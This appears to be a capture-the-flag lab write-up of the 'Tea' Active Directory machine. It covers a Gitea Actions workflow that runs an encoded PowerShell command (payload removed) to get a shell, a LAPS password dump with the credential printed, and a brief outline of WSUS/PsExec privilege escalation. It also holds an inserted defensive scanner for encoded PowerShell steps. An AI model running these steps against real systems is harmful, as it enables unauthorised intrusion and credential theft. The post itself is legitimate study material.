
VL - Tea

Enumeration

We start with a quick Nmap scan:

└─$ sudo nmap 10.10.205.21,22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:28 CET
Nmap scan report for 10.10.205.21
Host is up (0.017s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap scan report for 10.10.205.22
Host is up (0.015s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3000/tcp open  ppp
3389/tcp open  ms-wbt-server

We can infer that .21 is a DC; we start by exploring .22 first.

10.10.205.22

Local User

On port 80 a default IIS site is running, but on port 3000 Gitea is running with open registration. There are no repos, but in the settings there is a runner labeled windows:

As stated in the Gitea documentation, we have to enable Actions for the repository in order to use the runner. We can then create our own workflow in the repository at .gitea/workflows/demo.yaml:

name: Gitea Actions Demo
run-name: ${{ gitea.actor }} is testing out Gitea Actions 🚀
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: powershell -e <base64-encoded command removed>

After a short wait the workflow runs on the Windows runner and we get a shell!
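From the defender's side, the step above is what a review of pushed workflow files should catch: a run step on a self-hosted Windows runner that hands PowerShell an encoded command. The following added example (not part of the original post) scans workflow text for `powershell -e`/`-enc`/`-EncodedCommand` steps and decodes the UTF-16LE base64 payload so it can be read; the sample workflow and the benign encoded command in it are constructed for the demo.

```python
import base64
import re

# Constructed sample mirroring the post's workflow; {encoded} is filled in below
# with a benign command, not the original payload.
SAMPLE_WORKFLOW = """\
name: Gitea Actions Demo
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: powershell -e {encoded}
"""

# powershell -EncodedCommand expects base64 over UTF-16LE text.
ENC_RE = re.compile(
    r"powershell(?:\.exe)?\s+(?:\S+\s+)*?-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def encode_ps(command: str) -> str:
    """Encode a command the way powershell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def find_encoded_commands(workflow_text: str) -> list[dict]:
    """Return every run step that passes an encoded command to PowerShell, decoded for review."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        if "run:" not in line:
            continue
        match = ENC_RE.search(line)
        if not match:
            continue
        encoded = match.group(1)
        try:
            decoded = base64.b64decode(encoded).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not valid base64/UTF-16LE: still worth flagging
        findings.append({"line": lineno, "encoded": encoded, "decoded": decoded})
    return findings


if __name__ == "__main__":
    text = SAMPLE_WORKFLOW.format(encoded=encode_ps("Write-Output 'hello'"))
    for f in find_encoded_commands(text):
        print(f"line {f['line']}: {f['decoded']!r}")
```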

Privilege Escalation

In order to see hidden files and folders we can run: cmd /c dir /A. This reveals the _install folder, which has some interesting files in it:

Since we see a LAPS document and an MSI file, we can check whether we have the rights to read the LAPS password; none of the default tools show any output. Not too long ago LAPS 2.0 was released under the name Windows LAPS (thanks for the great name, Microsoft..). There is also a really interesting blog post about the internals of the new LAPS which I highly recommend reading.

PS C:\_install> Get-LapsADPassword -Identity srv -AsPlainText


ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : N1c3TryL0L
PasswordUpdateTime  : 12/24/2023 5:57:53 AM
ExpirationTimestamp : 1/23/2024 5:57:53 AM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

We can now become Administrator and obtain the second flag.

10.10.205.21

On .22 WSUS is running, a tool that helps with domain-wide server updates. We can use it to execute commands on other machines: we use a Microsoft-signed binary (PsExec) to add another user to the Administrators group on the DC.

We can use another version of SharpWSUS since the Nettitude version isn’t maintained anymore.

This post is licensed under CC BY 4.0 by the author.